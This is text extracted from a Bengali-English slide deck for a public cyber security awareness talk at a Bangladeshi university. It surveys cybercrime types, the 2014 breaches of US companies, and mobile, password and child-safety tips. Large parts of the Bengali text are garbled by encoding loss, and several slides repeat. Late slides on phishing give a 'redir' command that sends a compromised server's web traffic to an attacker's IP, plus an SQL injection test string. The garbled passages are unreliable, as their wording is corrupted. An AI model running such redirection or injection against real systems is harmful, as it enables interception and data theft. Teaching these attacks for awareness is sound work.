You are on page 1of 29

8/8/2019

সাইবার নিরাপত্তা

TALK PLAN
সাইবার নিরাপত্তা

 TIME: 25 MINUTES
ডঃ শামীম আহমদ  T YPE: PUBLIC TALK
অধ্যাপক, নসএসই নবভাগ
 OBJECTIVE: AWARENESS DEVELOPMENT
রাজশাহী নবশ্বনবদযালয়

CONTENTS
CONTENTS
 Introduction Introduction
 Types of Attract/Crimes  Types of Attract/Crimes
 Suggestion/Tips for Protections  Suggestion/Tips for Protections
 Challenges and Planning  Challenges and Planning
 Questions and Answer  Questions and Answer

সাইবার নিরাপত্তা সাইবার নিরাপত্তা

1
8/8/2019

What is a Cyber Security? What is a Cyber Crime?

‘Cybe rsecurity is the body of technol ogies, ‘Cybe r crime encompasses any criminal act dealing
processes and practices designed to protect with computers and networks (called hacking).
networks, computers, programs and data from Additionally, cyber crime also includes traditional
attack, damage or unauthorized’ crimes conducted through the Internet.’

http://whatis.techtarget.com/definition/cybersecurity http://www.webopedia.com/TERM/ C/cyber_crime.html

‘A major attack vector of Cyber Crime is to exploit


‘A major part of Cyber Security is to fix broken
broken software’
software’

Two sides of the same coin


Cyber Security Objectives
Cyber Crime
Cyber Security

INTEGRITY AVAILABILITY
authenticity access

CONFIDENTIALITY
disclosure

Decrease in broken software =


Increase in good software 8

2
8/8/2019

Cyber Security Objectives Cyber Security Objectives


USAGE USAGE
purpose purpose

INTEGRITY AVAILABILITY INTEGRITY USAGE AVAILABILITY


authenticity access authenticity access

CONFIDENTIALITY CONFIDENTIALITY
disclosure disclosure

9 10

CONTENTS
 Introduction
 Types of Attract/Crimes সাইবার নিরাপত্তা
 Suggestion/Tips for Protections
 Challenges and Planning
 Questions and Answer

 Individuals
 Industry/Organizations
 State/Country
সাইবার নিরাপত্তা

3
8/8/2019

HACKER’S WORLD

 BLACK HAT HACKER


 GRAY HAT HACKER
 WHITE HAT HACKER

Social engineering Social engineering

By improving employee awareness and


introducing simple technical measures,
organisations can protect themselves
against social engineering

Raising awareness about low-tech cyber


Exploits weaknesses in people attacks that exploit curiosity
Rather than Technology

4
8/8/2019

Email Exploits Email Exploits (Contd…)

Mail-flood attacks occur when so much mail is .


sent to a target that communication programs Malicious content is often propagated through
destabilize and crash the system.
e-mail systems. Some viruses and worms will be
carried into a system appearing as a legitimate
attachment

Email Exploits (Contd…) SPAM

• massmail, not personal addressed,


Social engineering e-mails are an attacker's
unwanted (commercial) content
attempt to trick a legitimate user into revealing
sensitive information or executing a task. E.g.,
posing as a network administrator to get your • Recipient's personal identity and context
password for system upgrades. are irrelevant because the message is
equally applicable to many other potential
recipients“
www.spamhaus.org

5
8/8/2019

Phishing IP Spoofing

• IP spoofing is when an attacker captures the


• Phishing scams are typically fraudulent email
routing packets to redirect a file or
messages or websites appearing as legitimate transmission to a different destination.
enterprises (e.g., your university, your Internet
service provider, your bank).

• These scams attempt to gather personal, financial


and sensitive information.

Flooding and Broadcasting


Forgery

 An attacker can significantly reduce the


processing capacity of a network by sending
more information requests than it can handle-a
classic denial of service.

6
8/8/2019

Theft of trade secrets! Electronic Threat !!

Electronic Extortion !! Fraud !!

7
8/8/2019

Perjury !!
Virus ! Worms! Trojan Hoarse!!!

Port Numbers
আরও ভয়ংকর … …

• The Well Known Ports are those from 0 Com pletely hidden from
through 1023.  O perating system
• The Registered Ports are those from 1024  Spec ial forensic software
through 49151.
• The Dynamic and/or Private Ports are those
from 49152 through 65535.

http://www.iana.org/assignments/port-numbers So u rce: h ttp://blog.kaspersky.com/equation-hdd-mal ware/


ftp://ftp.isi.edu/in-notes/rfc1700.txt

8
8/8/2019

Spyware in HDD!!! CONTENTS


Kas persky Lab have discovered :
 Introduction
Apparently state-created spyware buried in the firmware of hard drives
 S eag ate
 Types of Attract/Crimes
 Tos hiba
 Wes tern Digital ( Data for Industry/Organization)
I nfections have occurred in countries that are frequently US spying targets
 Suggestion/Tips for Protections
 C hina,  Challenges and Planning
 I ran
 P akistan  Questions and Answer
 Rus sia.

Wes tern Digital and Seagate have both of course denied

So u rce: h ttp://www.engadget.com/2015/02/16/hard-drive-spyware/ সাইবার নিরাপত্তা

Cyber Attacks On U.S. Companies In 2014


Target (ret ail). D ecem ber 2013, in which 40 million customer’s

ভয়াবহতা …. …. ….
credit and debit card

Neiman Marcus (retail). Between July an d October 2013, the


credit card information of 350,000 individuals was stolen

Michaels (retail). Between May 2013 and January 2014, the


paym ent cards of 2.6 million Michaels customers were affected

eBay (retail). : Allowing access to the contact and log-in


information for 233 m illion eBay

So u rce: Mr. Riley Walters


সাইবার নিরাপত্তা

9
8/8/2019

Cyber Attacks On U.S. Companies In 2014


Google : Reportedl y, 5 million Gmail usernames and passwords
were compromised

Goodwill Industries International (ret ail). Between February


2013 and August 2014, information for roughly 868,000 credit
an d debit cards was reportedly stolen

Bartell H otels (hotel). The information for up to 55,000


customers was reportedly stolen between February and May

Yahoo! Mail : The e-mail service for 273 million users was
reportedly hacked in January,

So u rce: Mr. Riley Walters Cyber Attack Timelines for March 2015

Cyber Attack Timelines for March 2015 Cyber Attack Timelines for March 2015

10
8/8/2019

The most serious


cyber attack on the
US military's networks
FROM … …
Country Distribution chart
Flash Drive
Cyber Attack Timelines for March 2015

CONTENTS
 Introduction
 Types of Attract/Crimes
 Law/Suggestion/Tips for Protections
The energy company BP >  Challenges and Planning
50,000 attempts/day  Questions and Answer
The Pentagon >
10 million attempts/Day

The National Nuclear Security


Administration> সাইবার নিরাপত্তা
10 million/Day

11
8/8/2019

Sec tion 54

আইি …. …. ….

সাইবার নিরাপত্তা
CYBER LAW

Handling Evidence: Recommendations

 Admissibility of Evidence
 Legal rules which determine whether potential
evidence can be considered by a court
 Must be obtained in a manner which ensures the
 Authenticity

 Validity

 No tampering had taken place

CYBER LAW

12
8/8/2019

Handling Evidence: Recommendations


সাইবার নিরাপত্তা
 No possible evidence is
 Damaged
 Destroyed
 Otherwise compromised by the procedures used to search the
computer
 Preventing viruses from being introduced to a computer during the  Individuals
 Industry/Organizations
analysis process
 Extracted / relevant evidence is properly handled and protected from
later mechanical or electromagnetic damage  State/Country

অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা নিি লক বযবহার করুি


(টাইমস অব ইনিয়া।) প্রনতটি অযান্ড্রযয়ড ফ াযি নিরাপত্তা নহযসযব
নিি লক করার সুনবধ্া রযয়যে। নপি,
পাসওয়াডড নকংবা পযাটািড লক পদ্ধনতর
মাধ্যযম আ পিার পণ্যটিযক লক কযর
রাখযত পাযরি।

অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।)


সাইবার নিরাপত্তা

13
8/8/2019

নডভাইস এিনিপ্ট করুি অন যসর কাযজ নিযজর পণ্য িয়

আপিার পযণ্যর সব ডাটা এিনিপ্ট করার ইন্টারযিট নিরাপত্তা পণ্য নিমড াতা ইযসযটর
সুনবধ্া ফদয় অযান্ড্রযয়ড। অ্যান্ড্রয়েযের গযবষযকরা বলযেি, অন যসর কাযজ নিযজর
সিসিউসরটি সিটিিংি সেযি োটা এনসিপ্ট পণ্য বযবহার কর ার সময় ঝুুঁনক সম্পযকড সযেতি
িরা যা়ে। িা যাকার কারযণ্ ৩০ ফযযক ৪০ শতাংশ ফেযেই
ডাটা বা তযযয ঢু ক যত আলাদা কযর ভাইরাস আিমযণ্র নশকার হওয়ার ঝুুঁনক ততনর
পাসওয়াডড ও নপি ফদওয়ার প্রযয়াজি পয়ে। হয়।

অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।) অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।)

অযান্ড্রযয়ড নডভাইস মযাযিজার সেল করুি

আপিার পণ্যটিযক গুগল মযাযপ ট্র্যাক করযত পারযবি এসনড কাযডড স্পশড কাতর তযয িয়
এমিনক দূর ফযযকই আপিার সব তযয মুযে নদযত
পারযবি। এসনড কাযডড র তযয সহযজ মুয ে ফ লা এবং হানতয য়
ফিওয়া সহ জ বযল গুরু ত্বপূণ্ড তযয সংরেযণ্ এসনড
ফসটিংস ফযযক নসনকউনরটিযত ফেযত হযব। নসনকউনরটি
ফসটিংযসর নডভাইস অযাডনমনিযেটর ফযযক আপনি নডভাইস
কাযডড ভরসা িা করাই ভাযলা।
মযাযিজার োলু করযত পাযরি।

অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।) অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।)

14
8/8/2019

ফেখাি ফসখাি ফযযক অযাপ ডাউিযলাড অযাপযসরজিযও তালা লাগাি


িয়
আপিার স্মাটডয াি বা টযাযব অনতনরক্ত নিরাপত্তা বযবস্থা
নিযয় অযাপস লক বযবহার করযত পাযরি।, োযত ফকাি
অযান্ড্রযয়যডর জিয গুগযলর ফে ফ টাযরর অযাপসই
নিনদড ষ্ট অযানেযক শি োলু করযত ফগযল আযগ পাসওয়াডড খুয ল
ডাউিযলাড করুি। ফকাযিা অযানেযক শি ইিটল করার
তারপর ঢু ক যত হয়।
আযগ আপিার অিু মনত োওয়া হযে নকিা তা ফখয়াল করুি
এবং অিুমন ত ফদওয়ার আযগ অযাপসটির উত্স সম্পযকড
নিনিত হি।

অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।) অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।)

ফ াি রুট করযবি িা ব্রাউনজং করুি েদ্মযবযশ

ফ াি রুট করা হযল ক াটম অযান্ড্রযয়ড রযমর পাশাপানশ েনদ ফিাম নদযয় ব্রাউজ কযরি তযব অবশযই গুগল
েনতকর অযাপসও ইিটল হযয় ফেযত পাযর। অযাকাউন্ট ফযযক সাইি আউট হযয় ব্রাউজ করযবি।

অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।) অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।)

15
8/8/2019

অযান্ড্রযয়ড নকটকযাট ৪.৪ বা লনলপযপ,


তাহযে গুগে আপনাযি সনরাপত্তা আপযেট
স টওয়যার হালিাগাদ রাখুি সিযে
গুগল স টওয়যার আ পযডট উন্মুক্ত কযর োর মযধ্য ফবশ নকেু
নিরাপত্তা পযাে ফদওয়া যাযক। অযান্ড্রযয়ড ফজনল নবি 4.2, তযে গুগে
আপনাযি সিাযনা সনরাপত্তা আপযেট
সিযে না।

অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।) অযান্ড্রযয়ড ওএযসর জিয নিরাপত্তা (টাইমস অব ইনিয়া।)

শনক্তশালী পাসওয়াডড (combination)


অিলাইি নিরাপত্তা নিযয় নকেু একই পাসওয়াডড একানধ্কবার বযবহার করা
টিপস … … … উনেত িয়। একই পাসওয়াডড নদযয়
ফমইল/ব্লগ/ফ ারাম/ডাউিযলাড সাইট
ইতযানদযত নিবন্ধি করা ফযযক নবরত যাকুি।

ফকাযাও অযাকাউন্ট এ লগইযির পর অবশযই


মযি কযর লগআউট করুি।

অিলাইি নিরাপত্তা নিযয় ফবশনকেু টিপস।


সাইবার নিরাপত্তা

16
8/8/2019

Strong Passwords' characteristics:


টু -ফটপ ফভনরন যকশি পদ্ধনত বযবহার
a) Contain both upper and low er case and alpha-numeric
characters (e.g., a-z, A-Z, 0-9)
b) Are at least six characters long.
সযেহজিক কযন্টযন্টর বযাপাযর অবনহত
c) Is not a w ord in any language, slang, dialect, jargon, etc. করুি
d) Are not based on personal information, names of family,
etc.
সাইবার কযায বা অযিযর কনম্পউটার
 Passw ords should never be w ritten dow n or stored on-line. ফযযক ফগাপি িম্বরগুযলা বযবহার িা করাই
Try to create passw ords that can be easily remembered.
 Do not use the "Remember Passw ord" feature of ভাল।
 do not w rite passw ords dow n and store them anyw here in
your office.
 Do not store passw ords in a file on ANY computer system অিলাইি নিরাপত্তা নিযয় ফবশনকেু টিপস।
w ithout encryption

স্পাইওয়যার -এর উপনস্থনত


 আপিার ইযমইল বক্স ফযযক অজািা ফকাি
ইযমইল ঠিকািায় ফমইল রওয়াডড হযে নকিা। অ্সিিািংশ সেযেই সিখা যা়ে িসিউটার সলা হয়ে
যাযে সিিংো ইন্টারযনট িাযনিশন ফলা হয়ে যাযে।
 ফপ্ররযকর (Form) ঘযর আপিার পনরনেত ফ কাি ফপ্রাগ্রাম নকংবা সানভডস চেযে সিনা। এমন
ফমইল অযাযেস যাকা মাযিই ফসই বযানক্ত ফমইল
সরাগ্রাম িনাক্ত িরার জনয িেযচ ভাযো পদ্ধসত হযে
কযরযে এমিটা মযি করার ফকাি কারি ফিই। গুগযের িাহাযয সনও়ো।
অযানন্ট স্পাইওয়যার টু ল

অিলাইি নিরাপত্তা নিযয় ফবশনকেু টিপস। নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস

17
8/8/2019

কনম্পউটার ফমরামযতর তযয েু নরর সমসযা 'ইন্টারযিট নসনকউনরটি সুযট‘

পাযসডা িাল ইি রযমশি অবশয সবসময়ই সনরযয় এযানন্টভাইরাযসর পাশাপানশ ায়ারওয়াল ,


ফরযখ ফদাকাযি কনম্পউটার ফদওয়া উনেত। এযানন্টস্পাইওয়যার, এযনন্টমযালওয়যার, স্পযামগাডড,
ইতযানদ একসাযয ফদয়া যাযক এবং েযাট , ফ সবুক ,
সান ড ং, ইযমল িহ সেসভন্ন সেযে সনরাপত্তা সি়ে।

নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস

ন নজকাল রাইট-ফপ্রাযটকশি সহ ফপি-োইভ ন নজকাল রাইট-ফপ্রাযটকশি সহ ফপি-োইভ

এসন্টভাইরাি োগাযনা সপন-ড্রাইভ যা সপন-ড্রাইযভই োযি এসন্টভাইরাি োগাযনা সপন-ড্রাইভ যা সপন-ড্রাইযভই োযি
ও সিাো়ে োগাযেই আযগ চােু হ়ে। ও সিাো়ে োগাযেই আযগ চােু হ়ে।
িযাস্পাসকি র ফ পাযটড বল এনন্ট-ভাইরাস লাগাযিা Tech িযাস্পাসকি র ফ পাযটড বল এনন্ট-ভাইরাস লাগাযিা Tech
Titan-এর "T-Drive Pro" নাযম এমন এিটা ৮ সজসে সপন- Titan-এর "T-Drive Pro" নাযম এমন এিটা ৮ সজসে সপন-
ড্রাইভ ড্রাইভ

নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস

18
8/8/2019

এনন্টভাইরাযসর নিয়নমত আপযডট পাযসড ািাল ায়ারওয়াল।

সিও সিও অযটা-আপযডট সিচার েন্ধ িযর রাযখন এেিং এর সু নবধ্ার ফেয য় অসু নবধ্া ফবনশ যাকযত পাযর।
সনযজর ইোমত সেশ সিেুস িন/িপ্তাহ/িয়েি িপ্তাহ পরপর সনতযকাযরর নকেু অযাটাক হ য়যতা ফেকাযত পাযর, নকন্তু
মযানু়োসে আপযেট িযে্ন। এটা ঠিি না । এরযে অযিক ফবনশ লস অযালামড ফ জিাযরট কযর।
(নসম্পল ব্রডকাট নপং নরযকাযয়ট )

নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস

এনন্টভাইরাযেও পাসওয়াডড নদযয় লক কযর


এনন্টভাইরাস/সুযযটর ফসটিংসগুনল রাখা, োযত এটা নডজএবল করা না যা়ে

তযব, ফকাি অপশযির মাযি কী তা পুযরাপুন র িা বুঝযল কাযজ এনন্টভাইরাস বা নসনকউনরটি


নড ল্ট ফসটিংস-এ অযানন্টভাইরাস োলাযবি স টওয়যাযরর কাে সেযি সিান োিা আিযে
সিটা আপনার অ্জ্ঞাযত সনসেিি ার সচযত্ত সিসেয
সেজএেে িযর সিযত পাযর

নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস

19
8/8/2019

স টওয়যার ইন্সটল করার সময় ো়ো বানক স টওয়যার ইন্সটল করার সময় ো়ো বানক
সময় অযাডনমি ফমাযড িা ফযযক সাধ্ারণ্ সময় অযাডনমি ফমাযড িা ফযযক সাধ্ারণ্
ফমাযড যাকা ভাযলা ফমাযড যাকা ভাযলা

এযত িযর সিও হুটহাট িযর িিটও়েযার নডনলট , ইিটল এযত িযর সিও হুটহাট িযর িিটও়েযার নডনলট, ইিটল
িরযত পারযেনা , ভাইরািও সিাযনা অ্যটাযমটিি িিটও়েযার িরযত পারযেনা, ভাইরািও সিাযনা অ্যটাযমটিি িিটও়েযার
ইন্সটে িরযত পারযেনা। নলিাযক্স ভাইরাস িমিযা না ইন্সটে িরযত পারযেনা। নলিায ক্স ভাইরাস িমিযা না
হোর অ্নযতম িারণ এটা, নসযটম ফলযভযল নকেু হোর অ্নযতম িারণ এটা, নসযটম ফলযভযল নকেু
বদলাযত হযলই পাসওয়াডড নদযত হয়। বদলাযত হযলই পাসওয়াডড নদযত হয়।

নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস

কনমউনিটি োনলত নলিাক্স নমন্ট ফবনশ ভাল


সমাধ্াি মযি হয়।
নশশুযদর বযপাযর নকেু সাধ্ারণ্
আর এখনিার িসিউটারগুযোর সয সাবধ্ািতা … … …
সস্পসিসিযিশন, তাযত সস্পশাোইজে উইযডাজ
অ্নসে িিট চাোযনার জনয সেনাক্স সেযিই
ভােুড য়াল বযক্স উইযিাজ োলাযিা োয়,

নিরাপযদ কনম্পউটার এবং ইন্টারযিট বযবহাযরর নকেু টিপস


সাইবার নিরাপত্তা

20
8/8/2019

 নশশুযদর অযাডনমি পাসওয়াডড জািাযিার প্রযয়াজি


অযিক নশশু গুজব ে়োযিা নকংবা মজা কযর অযিযর ফিই।
অযাকাউন্ট হযাক করার মযতা নবষযয় জন়েযয় প়েযত
পাযর নজনপএস, ওযয়বকযাম নিনিয় কযর রাখুি । পপ-আপ ব্লক
কযর নদি।
পযাযরন্টাল কযরাল নসযটম োলু কযর রাখুি । প্রনতটি
নশশুর জিয আলাদা লগ ই ি আইনড ও পাসওয়াডড ফসট কারও সযে অিলাইযি নববাদ িা করযত, কাউযক গানল
কযর নদি। িা নদযত, বয়স লু ন কযয় ফকাযিা সামানজক ফোগাযোযগর
সাইযট অযাকাউন্ট ততনর করযত নকংবা ফকাযিা গুজব
ে়োযিার নবষযয় তাযদর সতকড করুি।

নশশুযদর বযপাযর নকেু সাধ্ারণ্ সাবধ্ািতা নশশুযদর বযপাযর নকেু সাধ্ারণ্ সাবধ্ািতা

CONTENTS Challenges of Cyber Security


 Introduction The Internet has become the primary computing
 Types of Attract/Crimes platform. Standalone apps  Web-based  Cloud computing
Q: What are your most frequently used computer
 Suggestion/Tips for Protections
applications these days?
Challenges and Planning - Gaming ?
 Questions and Answer - Search engines ?
- Emailing, Texting
- Facebook, LinkedIn, Twitter, …
- Amazon, eBay, …
- Word processors
- Wikipedia, Google maps, …
সাইবার নিরাপত্তা - Google Docs, SkyDrive, Google Drive, Evernote, …
- Web browsers (HTTP)
UHCL-CSI 84

21
8/8/2019

Challenges of Cyber Security Challenges of Cyber Security


Astronomical data growth 4. Rich data types
- Fa cebook processes more
HTML, XHTML, XML,
than 500 TB of da ta daily
(8/22/2012: http://news.cnet.com/) MP3, MP4, …

- Q: How much da ta a re on MPEG4, AVI, WMV, …

the Internet? JPEG, GIF, BMP, …


The big four online storage & service JavaScripts, Java Applets, …
companies (Google, Microsoft,
Amazon, and Facebook) have got Encrypted data (SSL, IPSec, …)
1,200 petabytes (or 1.2
million terabytes ) http://www.space.com/19580-astronomy-mystery-
nova-star-explosion.html
http://sciencefocus.com/qa/how-many-terabytes-data-
are-internet

Challenges of BIG Data Challenges of Cyber Security


• Data science: Insufficient cyber security workers
extracting meaning - A zero-unemployment job market?
from data and creating
data products Alan Paller
SANS
(2011)
https://files.sans.org/

http://en.wikipedia.org/wiki/Data_science

22
8/8/2019

Challenges of Cyber Security


Challenges of Cyber Security • SANS Four Quadrants of Security Skills
• SANS Four Quadrants of Security Skills (2011)

UHCL-CSI

5/8/2013 UHCL-CSI 89

The Texas Cybersecurity Education and Economic Development Council (TCEEDC)

ফশষ কযা … … …

সাইবার নিরাপত্তা

23
8/8/2019

CYBER WAR
CYBER DEFENSE
সাইবার নিরাপত্তা

 Individuals
 Industry/Organizations
 State/Country ???
সাইবার নিরাপত্তা

E-POLICE WARNING! Corruptions!!

সাইবার নিরাপত্তা সাইবার নিরাপত্তা

24
8/8/2019

CONTENTS
 Introduction
 Types of Attract/Crimes
সাযয যাকার জিয  Law/Suggestion/Tips for Protections
ধ্িযবাদ  Challenges and Planning
 Questions and Answer

সাইবার নিরাপত্তা সাইবার নিরাপত্তা

How to phish? Compromised Web Servers


Found!!
 Compromised Web servers – Email and IM
 Port Redirection
 Botnets
Compromised
 Key loggers Web Server

Attacker

25
8/8/2019

Port Redirection Using Botnets


 Server is compromised and a program is loaded  Botnets are computers infected by worms or
 All the port 80 ie., http requests are redirected to Trojans and taken over surreptitiously by hackers
the attacker’s server and brought into networks to send spam, more
 Software known as ‘redir’ viruses, or launch denial of service attacks.
 Execute the software using:  Remotely controlled by the attacker.
redir --lport=80 –l addr=<IP addr orig server> -cport=80 -caddr=IP addr attacker  SQL Injection attacks

SQL Injection attacks Keyloggers


 Keyloggers are designed to monitor all the key
strokes
 Hardware
Server  Software
 Modified to extract personal information
Attack the server with some queries to drop the
tables:
http ://l oca lho st/p rod uct s.a sp?p rod uct Id=0 or 1= 1
SQL pattern matching: like '%admin%'

Attacker

26
8/8/2019

More about viruses Virus Detection by Emulation


Randomly generates a new key Decrypt and execute
 Viruses aren’t necessarily hard to write and corresponding decryptor code

Mutation A
 Cohen reports that his first virus took only 8
hours f or an experienced programmer to write. Virus body

 Viruses aren’t necessarily big Mutation B

 Cohen reports on a UNIX shell script virus that


was only 7 lines long Mutation C

To detect an unk nown mutation of a k nown v irus ,


emulate CPU execution of until the current sequence of
instruction opcodes matches the k nown sequence for v irus body

IP Spoofing – Flying-Blind
Spoofing
Attack
Definition: Definition:
An attacker alters his identity so that some one thinks he Attacker uses IP address of another computer to acquire
information or gain access
is some one else
– Email, User ID, IP Address, … Replies sent back to 10.10.20.30
– Attacker exploits trust relation between user and
networked machines to gain access to machines
Spoofed Address John
10.10.20.30 10.10.5.5

Types of Spoofing: From Address: 10.10.20.30


• Attacker changes his own IP address
To Address: 10.10.5.5
1. IP Spoofing: to spoofed address
• Attacker can send messages to a
2. Email Spoofing machine masquerading as spoofed
machine
3. Web Spoofing • Attacker can not receive messages Attacker
from that machine 10.10.50.50

27
8/8/2019

IP Spoofing – Source Routing Email Spoofing


Definition: Definition:
Attacker spoofs the address of another machine and Attacker sends messages masquerading as some one else
inserts itself between the attacked machine and the What can be the repercussions?
spoofed machine to intercept replies

Types of Email Spoofing:


Attacker intercepts packets
as they go to 10.10.20.30
From Address: 10.10.20.30
To Address: 10.10.5.5
1. Create an account with similar email address
– Sanjaygoel@yahoo.c om: A message fr om this account can
Replies sent back
to 10.10.20.30
per plex the students
Spoofed Address Attacker John 2. M odify a mail client
10.10.20.30 10.10.50.50 10.10.5.5
– Attacker can put in any r etur n addr ess he wants to in the mail
he sends
• The path a packet may change can var y over time
3. Telnet to port 25
• To ensur e that he stays in the loop the attacker uses sour ce r outing
to ensur e that the packet passes thr ough cer tain nodes on the – Most mail ser ver s use por t 25 for SMTP. Attacker logs on to this
networ k por t and composes a message for the user .

Web Spoofing – Tracking


Web Spoofing
• Basic
State
• Web Site maintains authentication so that the
– Attacker r egister s a web addr ess matching an entity e.g.
votebush.com, gepr oducts.com, gesucks.com user does not have to authenticate repeatedly
• M an-in-the-M iddle Attack • Three types of tracking methods are used:
– Attacker acts as a pr oxy between the web ser ver and the client 1. Cookies: Line of text with ID on the users cookie file
– Attacker has to compr omise the r outer or a node thr ough which
– Attacker can r ead the ID fr om user s cookie file
the r elevant tr affic flows
• URL Rewriting 2. URL Session Tracking: An id is appended to all the
– Attacker r edir ects web tr affic to another site that is contr olled by links in the website web pages.
the attacker – Attacker can guess or r ead this id and masquer ade as user
– Attacker wr ites his own web site addr ess befor e the legitimate 3. Hidden Form Elements
link
– ID is hidden in for m elements which ar e not visible to user
• Tracking State
– Hacker can modify these to masquer ade as another user
– When a user logs on to a site a per sistent authentication is
maintained
– This authentication can be stolen for masquer ading as the user

28
8/8/2019

Session Hijacking Session Hijacking


Definition:
Bob telnets to Serv er
Process of taking over an existing active session
Bob authenticates to Serv er
Serv er
Modus Operandi: Bob

1. User makes a connection to the server by Die! Hi! I am Bob


authenticating using his user ID and password.
2. After the users authenticate, they have access to the
server as long as the session lasts.
Attacker
3. Hacker takes the user offline by denial of service
4. Hacker gains access to the user by impersonating the • Attacker can
user – monitor the session
– per iodically inject commands into session
– launch passive and active attacks fr om the session

nmap nmap

Nmap’s guess at
the operating
sy stem type

Nmap is used to scan the


ports of the target sy stem.
Using the –O option would
also report the Operating
Sy stem of the target.

29

You might also like